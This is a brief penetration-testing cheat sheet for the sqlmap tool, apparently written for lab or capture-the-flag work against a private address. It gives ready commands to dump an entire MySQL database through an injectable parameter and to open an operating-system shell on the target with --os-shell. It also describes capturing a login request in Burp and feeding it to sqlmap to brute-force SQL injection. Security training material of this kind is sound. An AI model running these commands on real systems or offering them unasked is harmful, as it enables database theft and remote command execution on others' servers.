sqlmap

Automate database dump:

#sqlmap -u http://10.10.10.10/debug.php?id=1 -p “id” --dbms=mysql --dump

--dbms is the backend database type

--dump to dump all.

execute a shell:

#sqlmap -u http://10.10.10.10./debug.php?id=1 -p “id” --dbms=mysql --os-shell

Login Portal, SQL Brute Force:

If you have a login prompt that you suspect may be injectable; then setup burp to capture the traffic. Next try to authenticate withadmin:admin and capture it with burp. Copy the raw request into a file login.req. You may have to clean up the spacing of the request after the c&p. Then hand it to sql map: #sqlmap -r login.req //this will auto brute sqli to attempt a login.